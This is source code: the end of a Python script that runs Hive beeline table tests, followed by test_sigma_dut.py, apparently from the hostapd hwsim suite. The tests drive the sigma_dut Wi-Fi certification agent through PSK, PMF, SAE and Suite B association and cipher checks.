hive_jdbc_url, user, user, database) code, stdout = system_requests.execute_command(hive_command, user) time.sleep(int(sleep_time)) AuditLogger.info("HIVE COMMAND RESULT FOR USE DATABASE NAME" + str(database) + " : " + str(stdout)) hive_command = "{0} /usr/bin/beeline -u '{1}' -n {2} -p {3} -d org.apache.hive.jdbc.HiveDriver -e 'create table {4}.test_table_{5}(id Int, name String);'".format(kinit_command, hive_jdbc_url, user, user, database, random_numbers) code, stdout = system_requests.execute_command(hive_command, user) time.sleep(int(sleep_time)) AuditLogger.info("HIVE COMMAND RESULT FOR CREATE TABLE NAME test_table_" + str(random_numbers) + " : " + str(stdout)) hive_command = "{0} /usr/bin/beeline -u '{1}' -n {2} -p {3} -d org.apache.hive.jdbc.HiveDriver -e 'drop table if exists {4}.test_table_{5};'".format(kinit_command, hive_jdbc_url, user, user, database, random_numbers) code, stdout = system_requests.execute_command(hive_command, user) time.sleep(int(sleep_time)) AuditLogger.info("HIVE COMMAND RESULT FOR DROP TABLE NAME test_table_" + str(random_numbers) + " : " + str(stdout)) hive_command = "{0} /usr/bin/beeline -u '{1}' -n {2} -p {3} -d org.apache.hive.jdbc.HiveDriver -e 'show databases;'".format(kinit_command, hive_jdbc_url, user, user) code, stdout = system_requests.execute_command(hive_command, user) time.sleep(int(sleep_time)) AuditLogger.info("HIVE COMMAND RESULT FOR SHOW DATABASES" + str(database) + " : " + str(stdout)) if __name__ == '__main__': main()
test_sigma_dut.py
# Test cases for sigma_dut # Copyright (c) 2017, Qualcomm Atheros, Inc. # # This software may be distributed under the terms of the BSD license. # See README for more details. import binascii import logging logger = logging.getLogger() import os import socket import struct import subprocess import threading import time import hostapd from utils import HwsimSkip from hwsim import HWSimRadio import hwsim_utils from test_dpp import check_dpp_capab, update_hapd_config from test_suite_b import check_suite_b_192_capa, suite_b_as_params, suite_b_192_rsa_ap_params from test_ap_eap import check_eap_capa from test_ap_hs20 import hs20_ap_params def check_sigma_dut(): if not os.path.exists("./sigma_dut"): raise HwsimSkip("sigma_dut not available") def to_hex(s): return binascii.hexlify(s.encode()).decode() def from_hex(s): return binascii.unhexlify(s).decode() def sigma_dut_cmd(cmd, port=9000, timeout=2): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP) sock.settimeout(timeout) addr = ('127.0.0.1', port) sock.connect(addr) sock.send(cmd.encode() + b"\r\n") try: res = sock.recv(1000).decode() running = False done = False for line in res.splitlines(): if line.startswith("status,RUNNING"): running = True elif line.startswith("status,INVALID"): done = True elif line.startswith("status,ERROR"): done = True elif line.startswith("status,COMPLETE"): done = True if running and not done: # Read the actual response res = sock.recv(1000).decode() except: res = '' pass sock.close() res = res.rstrip() logger.debug("sigma_dut: '%s' --> '%s'" % (cmd, res)) return res def sigma_dut_cmd_check(cmd, port=9000, timeout=2): res = sigma_dut_cmd(cmd, port=port, timeout=timeout) if "COMPLETE" not in res: raise Exception("sigma_dut command failed: " + cmd) return res def start_sigma_dut(ifname, debug=False, hostapd_logdir=None, cert_path=None, bridge=None): check_sigma_dut() cmd = ['./sigma_dut', '-M', ifname, '-S', ifname, '-F', '../../hostapd/hostapd', '-G', '-w', '/var/run/wpa_supplicant/', '-j', ifname] if debug: cmd += ['-d'] if hostapd_logdir: cmd += ['-H', hostapd_logdir] if cert_path: cmd += ['-C', cert_path] if bridge: cmd += ['-b', bridge] sigma = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE) for i in range(20): try: res = sigma_dut_cmd("HELLO") break except: time.sleep(0.05) return sigma def stop_sigma_dut(sigma): sigma.terminate() sigma.wait() out, err = sigma.communicate() logger.debug("sigma_dut stdout: " + str(out.decode())) logger.debug("sigma_dut stderr: " + str(err.decode())) def sigma_dut_wait_connected(ifname): for i in range(50): res = sigma_dut_cmd("sta_is_connected,interface," + ifname) if "connected,1" in res: break time.sleep(0.2) if i == 49: raise Exception("Connection did not complete") def test_sigma_dut_basic(dev, apdev): """sigma_dut basic functionality""" sigma = start_sigma_dut(dev[0].ifname) res = sigma_dut_cmd("UNKNOWN") if "status,INVALID,errorCode,Unknown command" not in res: raise Exception("Unexpected sigma_dut response to unknown command") tests = [("ca_get_version", "status,COMPLETE,version,1.0"), ("device_get_info", "status,COMPLETE,vendor"), ("device_list_interfaces,interfaceType,foo", "status,ERROR"), ("device_list_interfaces,interfaceType,802.11", "status,COMPLETE,interfaceType,802.11,interfaceID," + dev[0].ifname)] for cmd, response in tests: res = sigma_dut_cmd(cmd) if response not in res: raise Exception("Unexpected %s response: %s" % (cmd, res)) stop_sigma_dut(sigma) def test_sigma_dut_open(dev, apdev): """sigma_dut controlled open network association""" try: run_sigma_dut_open(dev, apdev) finally: dev[0].set("ignore_old_scan_res", "0") def run_sigma_dut_open(dev, apdev): ifname = dev[0].ifname sigma = start_sigma_dut(ifname) hapd = hostapd.add_ap(apdev[0], {"ssid": "open"}) sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname) sigma_dut_cmd_check("sta_set_encryption,interface,%s,ssid,%s,encpType,none" % (ifname, "open")) sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s" % (ifname, "open")) sigma_dut_wait_connected(ifname) sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname) sigma_dut_cmd_check("sta_disconnect,interface," + ifname) sigma_dut_cmd_check("sta_reset_default,interface," + ifname) stop_sigma_dut(sigma) def test_sigma_dut_psk_pmf(dev, apdev): """sigma_dut controlled PSK+PMF association""" try: run_sigma_dut_psk_pmf(dev, apdev) finally: dev[0].set("ignore_old_scan_res", "0") def run_sigma_dut_psk_pmf(dev, apdev): ifname = dev[0].ifname sigma = start_sigma_dut(ifname) ssid = "test-pmf-required" params = hostapd.wpa2_params(ssid=ssid, passphrase="12345678") params["wpa_key_mgmt"] = "WPA-PSK-SHA256" params["ieee80211w"] = "2" hapd = hostapd.add_ap(apdev[0], params) sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,PMF" % ifname) sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname) sigma_dut_cmd_check("sta_set_psk,interface,%s,ssid,%s,passphrase,%s,encpType,aes-ccmp,keymgmttype,wpa2,PMF,Required" % (ifname, "test-pmf-required", "12345678")) sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-pmf-required")) sigma_dut_wait_connected(ifname) sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname) sigma_dut_cmd_check("sta_disconnect,interface," + ifname) sigma_dut_cmd_check("sta_reset_default,interface," + ifname) stop_sigma_dut(sigma) def test_sigma_dut_psk_pmf_bip_cmac_128(dev, apdev): """sigma_dut controlled PSK+PMF association with BIP-CMAC-128""" try: run_sigma_dut_psk_pmf_cipher(dev, apdev, "BIP-CMAC-128", "AES-128-CMAC") finally: dev[0].set("ignore_old_scan_res", "0") def test_sigma_dut_psk_pmf_bip_cmac_256(dev, apdev): """sigma_dut controlled PSK+PMF association with BIP-CMAC-256""" try: run_sigma_dut_psk_pmf_cipher(dev, apdev, "BIP-CMAC-256", "BIP-CMAC-256") finally: dev[0].set("ignore_old_scan_res", "0") def test_sigma_dut_psk_pmf_bip_gmac_128(dev, apdev): """sigma_dut controlled PSK+PMF association with BIP-GMAC-128""" try: run_sigma_dut_psk_pmf_cipher(dev, apdev, "BIP-GMAC-128", "BIP-GMAC-128") finally: dev[0].set("ignore_old_scan_res", "0") def test_sigma_dut_psk_pmf_bip_gmac_256(dev, apdev): """sigma_dut controlled PSK+PMF association with BIP-GMAC-256""" try: run_sigma_dut_psk_pmf_cipher(dev, apdev, "BIP-GMAC-256", "BIP-GMAC-256") finally: dev[0].set("ignore_old_scan_res", "0") def test_sigma_dut_psk_pmf_bip_gmac_256_mismatch(dev, apdev): """sigma_dut controlled PSK+PMF association with BIP-GMAC-256 mismatch""" try: run_sigma_dut_psk_pmf_cipher(dev, apdev, "BIP-GMAC-256", "AES-128-CMAC", failure=True) finally: dev[0].set("ignore_old_scan_res", "0") def run_sigma_dut_psk_pmf_cipher(dev, apdev, sigma_cipher, hostapd_cipher, failure=False): ifname = dev[0].ifname sigma = start_sigma_dut(ifname) ssid = "test-pmf-required" params = hostapd.wpa2_params(ssid=ssid, passphrase="12345678") params["wpa_key_mgmt"] = "WPA-PSK-SHA256" params["ieee80211w"] = "2" params["group_mgmt_cipher"] = hostapd_cipher hapd = hostapd.add_ap(apdev[0], params) sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,PMF" % ifname) sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname) sigma_dut_cmd_check("sta_set_psk,interface,%s,ssid,%s,passphrase,%s,encpType,aes-ccmp,keymgmttype,wpa2,PMF,Required,GroupMgntCipher,%s" % (ifname, "test-pmf-required", "12345678", sigma_cipher)) sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-pmf-required")) if failure: ev = dev[0].wait_event(["CTRL-EVENT-NETWORK-NOT-FOUND", "CTRL-EVENT-CONNECTED"], timeout=10) if ev is None: raise Exception("Network selection result not indicated") if "CTRL-EVENT-CONNECTED" in ev: raise Exception("Unexpected connection") res = sigma_dut_cmd("sta_is_connected,interface," + ifname) if "connected,1" in res: raise Exception("Connection reported") else: sigma_dut_wait_connected(ifname) sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname) sigma_dut_cmd_check("sta_disconnect,interface," + ifname) sigma_dut_cmd_check("sta_reset_default,interface," + ifname) stop_sigma_dut(sigma) def test_sigma_dut_sae(dev, apdev): """sigma_dut controlled SAE association""" if "SAE" not in dev[0].get_capability("auth_alg"): raise HwsimSkip("SAE not supported") ifname = dev[0].ifname sigma = start_sigma_dut(ifname) ssid = "test-sae" params = hostapd.wpa2_params(ssid=ssid, passphrase="12345678") params['wpa_key_mgmt'] = 'SAE' params["ieee80211w"] = "2" params['sae_groups'] = '19 20 21' hapd = hostapd.add_ap(apdev[0], params) sigma_dut_cmd_check("sta_reset_default,interface,%s" % ifname) sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname) sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,passphrase,%s,type,SAE,encpType,aes-ccmp,keymgmttype,wpa2" % (ifname, "test-sae", "12345678")) sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-sae")) sigma_dut_wait_connected(ifname) sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname) if dev[0].get_status_field('sae_group') != '19': raise Exception("Expected default SAE group not used") sigma_dut_cmd_check("sta_disconnect,interface," + ifname) sigma_dut_cmd_check("sta_reset_default,interface," + ifname) sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname) sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,passphrase,%s,type,SAE,encpType,aes-ccmp,keymgmttype,wpa2,ECGroupID,20" % (ifname, "test-sae", "12345678")) sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-sae")) sigma_dut_wait_connected(ifname) sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname) if dev[0].get_status_field('sae_group') != '20': raise Exception("Expected SAE group not used") sigma_dut_cmd_check("sta_disconnect,interface," + ifname) sigma_dut_cmd_check("sta_reset_default,interface," + ifname) stop_sigma_dut(sigma) def test_sigma_dut_sae_password(dev, apdev): """sigma_dut controlled SAE association and long password""" if "SAE" not in dev[0].get_capability("auth_alg"): raise HwsimSkip("SAE not supported") ifname = dev[0].ifname sigma = start_sigma_dut(ifname) try: ssid = "test-sae" params = hostapd.wpa2_params(ssid=ssid) params['sae_password'] = 100*'B' params['wpa_key_mgmt'] = 'SAE' params["ieee80211w"] = "2" hapd = hostapd.add_ap(apdev[0], params) sigma_dut_cmd_check("sta_reset_default,interface,%s" % ifname) sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname) sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,passphrase,%s,type,SAE,encpType,aes-ccmp,keymgmttype,wpa2" % (ifname, "test-sae", 100*'B')) sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-sae")) sigma_dut_wait_connected(ifname) sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname) sigma_dut_cmd_check("sta_disconnect,interface," + ifname) sigma_dut_cmd_check("sta_reset_default,interface," + ifname) finally: stop_sigma_dut(sigma) def test_sigma_dut_sta_override_rsne(dev, apdev): """sigma_dut and RSNE override on STA""" try: run_sigma_dut_sta_override_rsne(dev, apdev) finally: dev[0].set("ignore_old_scan_res", "0") def run_sigma_dut_sta_override_rsne(dev, apdev): ifname = dev[0].ifname sigma = start_sigma_dut(ifname) ssid = "test-psk" params = hostapd.wpa2_params(ssid=ssid, passphrase="12345678") hapd = hostapd.add_ap(apdev[0], params) sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname) tests = ["30120100000fac040100000fac040100000fac02", "30140100000fac040100000fac040100000fac02ffff"] for test in tests: sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,type,PSK,passphrase,%s,EncpType,aes-ccmp,KeyMgmtType,wpa2" % (ifname, "test-psk", "12345678")) sigma_dut_cmd_check("dev_configure_ie,interface,%s,IE_Name,RSNE,Contents,%s" % (ifname, test)) sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-psk")) sigma_dut_wait_connected(ifname) sigma_dut_cmd_check("sta_disconnect,interface," + ifname) dev[0].dump_monitor() sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,type,PSK,passphrase,%s,EncpType,aes-ccmp,KeyMgmtType,wpa2" % (ifname, "test-psk", "12345678")) sigma_dut_cmd_check("dev_configure_ie,interface,%s,IE_Name,RSNE,Contents,300101" % ifname) sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-psk")) ev = dev[0].wait_event(["CTRL-EVENT-ASSOC-REJECT"]) if ev is None: raise Exception("Association rejection not reported") if "status_code=40" not in ev: raise Exception("Unexpected status code: " + ev) sigma_dut_cmd_check("sta_reset_default,interface," + ifname) stop_sigma_dut(sigma) def test_sigma_dut_ap_psk(dev, apdev): """sigma_dut controlled AP""" with HWSimRadio() as (radio, iface): sigma = start_sigma_dut(iface) try: sigma_dut_cmd_check("ap_reset_default") sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-psk,MODE,11ng") sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-PSK,PSK,12345678") sigma_dut_cmd_check("ap_config_commit,NAME,AP") dev[0].connect("test-psk", psk="12345678", scan_freq="2412") sigma_dut_cmd_check("ap_reset_default") finally: stop_sigma_dut(sigma) def test_sigma_dut_ap_pskhex(dev, apdev, params): """sigma_dut controlled AP and PSKHEX""" logdir = os.path.join(params['logdir'], "sigma_dut_ap_pskhex.sigma-hostapd") with HWSimRadio() as (radio, iface): sigma = start_sigma_dut(iface, hostapd_logdir=logdir) try: psk = "0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef" sigma_dut_cmd_check("ap_reset_default") sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-psk,MODE,11ng") sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-PSK,PSKHEX," + psk) sigma_dut_cmd_check("ap_config_commit,NAME,AP") dev[0].connect("test-psk", raw_psk=psk, scan_freq="2412") sigma_dut_cmd_check("ap_reset_default") finally: stop_sigma_dut(sigma) def test_sigma_dut_ap_psk_sha256(dev, apdev, params): """sigma_dut controlled AP PSK SHA256""" logdir = os.path.join(params['logdir'], "sigma_dut_ap_psk_sha256.sigma-hostapd") with HWSimRadio() as (radio, iface): sigma = start_sigma_dut(iface) try: sigma_dut_cmd_check("ap_reset_default") sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-psk,MODE,11ng") sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-PSK-256,PSK,12345678") sigma_dut_cmd_check("ap_config_commit,NAME,AP") dev[0].connect("test-psk", key_mgmt="WPA-PSK-SHA256", psk="12345678", scan_freq="2412") sigma_dut_cmd_check("ap_reset_default") finally: stop_sigma_dut(sigma) def test_sigma_dut_suite_b(dev, apdev, params): """sigma_dut controlled STA Suite B""" check_suite_b_192_capa(dev) logdir = params['logdir'] with open("auth_serv/ec2-ca.pem", "r") as f: with open(os.path.join(logdir, "suite_b_ca.pem"), "w") as f2: f2.write(f.read()) with open("auth_serv/ec2-user.pem", "r") as f: with open("auth_serv/ec2-user.key", "r") as f2: with open(os.path.join(logdir, "suite_b.pem"), "w") as f3: f3.write(f.read()) f3.write(f2.read()) dev[0].flush_scan_cache() params = suite_b_as_params() params['ca_cert'] = 'auth_serv/ec2-ca.pem' params['server_cert'] = 'auth_serv/ec2-server.pem' params['private_key'] = 'auth_serv/ec2-server.key' params['openssl_ciphers'] = 'SUITEB192' hostapd.add_ap(apdev[1], params) params = {"ssid": "test-suite-b", "wpa": "2", "wpa_key_mgmt": "WPA-EAP-SUITE-B-192", "rsn_pairwise": "GCMP-256", "group_mgmt_cipher": "BIP-GMAC-256", "ieee80211w": "2", "ieee8021x": "1", 'auth_server_addr': "127.0.0.1", 'auth_server_port': "18129", 'auth_server_shared_secret': "radius", 'nas_identifier': "nas.w1.fi"} hapd = hostapd.add_ap(apdev[0], params) ifname = dev[0].ifname sigma = start_sigma_dut(ifname, cert_path=logdir) sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,PMF" % ifname) sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname) sigma_dut_cmd_check("sta_set_security,type,eaptls,interface,%s,ssid,%s,PairwiseCipher,AES-GCMP-256,GroupCipher,AES-GCMP-256,GroupMgntCipher,BIP-GMAC-256,keymgmttype,SuiteB,clientCertificate,suite_b.pem,trustedRootCA,suite_b_ca.pem,CertType,ECC" % (ifname, "test-suite-b")) sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-suite-b")) sigma_dut_wait_connected(ifname) sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname) sigma_dut_cmd_check("sta_disconnect,interface," + ifname) sigma_dut_cmd_check("sta_reset_default,interface," + ifname) stop_sigma_dut(sigma) def test_sigma_dut_suite_b_rsa(dev, apdev, params): """sigma_dut controlled STA Suite B (RSA)""" check_suite_b_192_capa(dev) logdir = params['logdir'] with open("auth_serv/rsa3072-ca.pem", "r") as f: with open(os.path.join(logdir, "suite_b_ca_rsa.pem"), "w") as f2: f2.write(f.read()) with open("auth_serv/rsa3072-user.pem", "r") as f: with open("auth_serv/rsa3072-user.key", "r") as f2: with open(os.path.join(logdir, "suite_b_rsa.pem"), "w") as f3: f3.write(f.read()) f3.write(f2.read()) dev[0].flush_scan_cache() params = suite_b_192_rsa_ap_params() hapd = hostapd.add_ap(apdev[0], params) ifname = dev[0].ifname sigma = start_sigma_dut(ifname, cert_path=logdir) cmd = "sta_set_security,type,eaptls,interface,%s,ssid,%s,PairwiseCipher,AES-GCMP-256,GroupCipher,AES-GCMP-256,GroupMgntCipher,BIP-GMAC-256,keymgmttype,SuiteB,clientCertificate,suite_b_rsa.pem,trustedRootCA,suite_b_ca_rsa.pem,CertType,RSA" % (ifname, "test-suite-b") tests = ["", ",TLSCipher,TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384", ",TLSCipher,TLS_DHE_RSA_WITH_AES_256_GCM_SHA384"] for extra in tests: sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,PMF" % ifname) sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname) sigma_dut_cmd_check(cmd + extra) sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-suite-b")) sigma_dut_wait_connected(ifname) sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname) sigma_dut_cmd_check("sta_disconnect,interface," + ifname) sigma_dut_cmd_check("sta_reset_default,interface," + ifname) stop_sigma_dut(sigma) def test_sigma_dut_ap_suite_b(dev, apdev, params): """sigma_dut controlled AP Suite B""" check_suite_b_192_capa(dev) logdir = os.path.join(params['logdir'], "sigma_dut_ap_suite_b.sigma-hostapd") params = suite_b_as_params() params['ca_cert'] = 'auth_serv/ec2-ca.pem' params['server_cert'] = 'auth_serv/ec2-server.pem' params['private_key'] = 'auth_serv/ec2-server.key' params['openssl_ciphers'] = 'SUITEB192' hostapd.add_ap(apdev[1], params) with HWSimRadio() as (radio, iface): sigma = start_sigma_dut(iface, hostapd_logdir=logdir) try: sigma_dut_cmd_check("ap_reset_default") sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-suite-b,MODE,11ng") sigma_dut_cmd_check("ap_set_radius,NAME,AP,IPADDR,127.0.0.1,PORT,18129,PASSWORD,radius") sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,SuiteB") sigma_dut_cmd_check("ap_config_commit,NAME,AP") dev[0].connect("test-suite-b", key_mgmt="WPA-EAP-SUITE-B-192", ieee80211w="2", openssl_ciphers="SUITEB192", eap="TLS", identity="tls user", ca_cert="auth_serv/ec2-ca.pem", client_cert="auth_serv/ec2-user.pem", private_key="auth_serv/ec2-user.key", pairwise="GCMP-256", group="GCMP-256", scan_freq="2412") sigma_dut_cmd_check("ap_reset_default") finally: stop_sigma_dut(sigma) def test_sigma_dut_ap_cipher_gcmp_128(dev, apdev, params): """sigma_dut controlled AP with GCMP-128/BIP-GMAC-128 cipher""" run_sigma_dut_ap_cipher(dev, apdev, params, "AES-GCMP-128", "BIP-GMAC-128", "GCMP") def test_sigma_dut_ap_cipher_gcmp_256(dev, apdev, params): """sigma_dut controlled AP with GCMP-256/BIP-GMAC-256 cipher""" run_sigma_dut_ap_cipher(dev, apdev, params, "AES-GCMP-256", "BIP-GMAC-256", "GCMP-256") def test_sigma_dut_ap_cipher_ccmp_128(dev, apdev, params): """sigma_dut controlled AP with CCMP-128/BIP-CMAC-128 cipher""" run_sigma_dut_ap_cipher(dev, apdev, params, "AES-CCMP-128", "BIP-CMAC-128", "CCMP") def test_sigma_dut_ap_cipher_ccmp_256(dev, apdev, params): """sigma_dut controlled AP with CCMP-256/BIP-CMAC-256 cipher""" run_sigma_dut_ap_cipher(dev, apdev, params, "AES-CCMP-256", "BIP-CMAC-256", "CCMP-256") def test_sigma_dut_ap_cipher_ccmp_gcmp_1(dev, apdev, params): """sigma_dut controlled AP with CCMP-128+GCMP-256 ciphers (1)""" run_sigma_dut_ap_cipher(dev, apdev, params, "AES-CCMP-128 AES-GCMP-256", "BIP-GMAC-256", "CCMP") def test_sigma_dut_ap_cipher_ccmp_gcmp_2(dev, apdev, params): """sigma_dut controlled AP with CCMP-128+GCMP-256 ciphers (2)""" run_sigma_dut_ap_cipher(dev, apdev, params, "AES-CCMP-128 AES-GCMP-256", "BIP-GMAC-256", "GCMP-256", "CCMP") def test_sigma_dut_ap_cipher_gcmp_256_group_ccmp(dev, apdev, params): """sigma_dut controlled AP with GCMP-256/CCMP/BIP-GMAC-256 cipher""" run_sigma_dut_ap_cipher(dev, apdev, params, "AES-GCMP-256", "BIP-GMAC-256", "GCMP-256", "CCMP", "AES-CCMP-128") def run_sigma_dut_ap_cipher(dev, apdev, params, ap_pairwise, ap_group_mgmt, sta_cipher, sta_cipher_group=None, ap_group=None): check_suite_b_192_capa(dev) logdir = os.path.join(params['logdir'], "sigma_dut_ap_cipher.sigma-hostapd") params = suite_b_as_params() params['ca_cert'] = 'auth_serv/ec2-ca.pem' params['server_cert'] = 'auth_serv/ec2-server.pem' params['private_key'] = 'auth_serv/ec2-server.key' params['openssl_ciphers'] = 'SUITEB192' hostapd.add_ap(apdev[1], params) with HWSimRadio() as (radio, iface): sigma = start_sigma_dut(iface, hostapd_logdir=logdir) try: sigma_dut_cmd_check("ap_reset_default") sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-suite-b,MODE,11ng") sigma_dut_cmd_check("ap_set_radius,NAME,AP,IPADDR,127.0.0.1,PORT,18129,PASSWORD,radius") cmd = "ap_set_security,NAME,AP,KEYMGNT,SuiteB,PMF,Required,PairwiseCipher,%s,GroupMgntCipher,%s" % (ap_pairwise, ap_group_mgmt) if ap_group: cmd += ",GroupCipher,%s" % ap_group sigma_dut_cmd_check(cmd) sigma_dut_cmd_check("ap_config_commit,NAME,AP") if sta_cipher_group is None: sta_cipher_group = sta_cipher dev[0].connect("test-suite-b", key_mgmt="WPA-EAP-SUITE-B-192", ieee80211w="2", openssl_ciphers="SUITEB192", eap="TLS", identity="tls user", ca_cert="auth_serv/ec2-ca.pem", client_cert="auth_serv/ec2-user.pem", private_key="auth_serv/ec2-user.key", pairwise=sta_cipher, group=sta_cipher_group, scan_freq="2412") sigma_dut_cmd_check("ap_reset_default") finally: stop_sigma_dut(sigma) def test_sigma_dut_ap_override_rsne(dev, apdev): """sigma_dut controlled AP overriding RSNE""" with HWSimRadio() as (radio, iface): sigma = start_sigma_dut(iface) try: sigma_dut_cmd_check("ap_reset_default") sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-psk,MODE,11ng") sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-PSK,PSK,12345678") sigma_dut_cmd_check("dev_configure_ie,NAME,AP,interface,%s,IE_Name,RSNE,Contents,30180100000fac040200ffffffff000fac040100000fac020c00" % iface) sigma_dut_cmd_check("ap_config_commit,NAME,AP") dev[0].connect("test-psk", psk="12345678", scan_freq="2412") sigma_dut_cmd_check("ap_reset_default") finally: stop_sigma_dut(sigma) def test_sigma_dut_ap_sae(dev, apdev, params): """sigma_dut controlled AP with SAE""" logdir = os.path.join(params['logdir'], "sigma_dut_ap_sae.sigma-hostapd") if "SAE" not in dev[0].get_capability("auth_alg"): raise HwsimSkip("SAE not supported") with HWSimRadio() as (radio, iface): sigma = start_sigma_dut(iface, hostapd_logdir=logdir) try: sigma_dut_cmd_check("ap_reset_default") sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-sae,MODE,11ng") sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-SAE,PSK,12345678") sigma_dut_cmd_check("ap_config_commit,NAME,AP") dev[0].request("SET sae_groups ") dev[0].connect("test-sae", key_mgmt="SAE", psk="12345678", ieee80211w="2", scan_freq="2412") if dev[0].get_status_field('sae_group') != '19': raise Exception("Expected default SAE group not used") sigma_dut_cmd_check("ap_reset_default") finally: stop_sigma_dut(sigma) def test_sigma_dut_ap_sae_password(dev, apdev, params): """sigma_dut controlled AP with SAE and long password""" logdir = os.path.join(params['logdir'], "sigma_dut_ap_sae_password.sigma-hostapd") if "SAE" not in dev[0].get_capability("auth_alg"): raise HwsimSkip("SAE not supported") with HWSimRadio() as (radio, iface): sigma = start_sigma_dut(iface, hostapd_logdir=logdir) try: sigma_dut_cmd_check("ap_reset_default") sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-sae,MODE,11ng") sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-SAE,PSK," + 100*'C') sigma_dut_cmd_check("ap_config_commit,NAME,AP") dev[0].request("SET sae_groups ") dev[0].connect("test-sae", key_mgmt="SAE", sae_password=100*'C', ieee80211w="2", scan_freq="2412") if dev[0].get_status_field('sae_group') != '19': raise Exception("Expected default SAE group not used") sigma_dut_cmd_check("ap_reset_default") finally: stop_sigma_dut(sigma) def test_sigma_dut_ap_sae_group(dev, apdev, params): """sigma_dut controlled AP with SAE and specific group""" logdir = os.path.join(params['logdir'], "sigma_dut_ap_sae_group.sigma-hostapd") if "SAE" not in dev[0].get_capability("auth_alg"): raise HwsimSkip("SAE not supported") with HWSimRadio() as (radio, iface): sigma = start_sigma_dut(iface, hostapd_logdir=logdir) try: sigma_dut_cmd_check("ap_reset_default") sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-sae,MODE,11ng") sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-SAE,PSK,12345678,ECGroupID,20") sigma_dut_cmd_check("ap_config_commit,NAME,AP") dev[0].request("SET sae_groups ") dev[0].connect("test-sae", key_mgmt="SAE", psk="12345678", ieee80211w="2", scan_freq="2412") if dev[0].get_status_field('sae_group') != '20': raise Exception("Expected SAE group not used") sigma_dut_cmd_check("ap_reset_default") finally: stop_sigma_dut(sigma) def test_sigma_dut_ap_psk_sae(dev, apdev, params): """sigma_dut controlled AP with PSK+SAE""" if "SAE" not in dev[0].get_capability("auth_alg"): raise HwsimSkip("SAE not supported") logdir = os.path.join(params['logdir'], "sigma_dut_ap_psk_sae.sigma-hostapd") with HWSimRadio() as (radio, iface): sigma = start_sigma_dut(iface, hostapd_logdir=logdir) try: sigma_dut_cmd_check("ap_reset_default") sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-sae,MODE,11ng") sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-PSK-SAE,PSK,12345678") sigma_dut_cmd_check("ap_config_commit,NAME,AP") 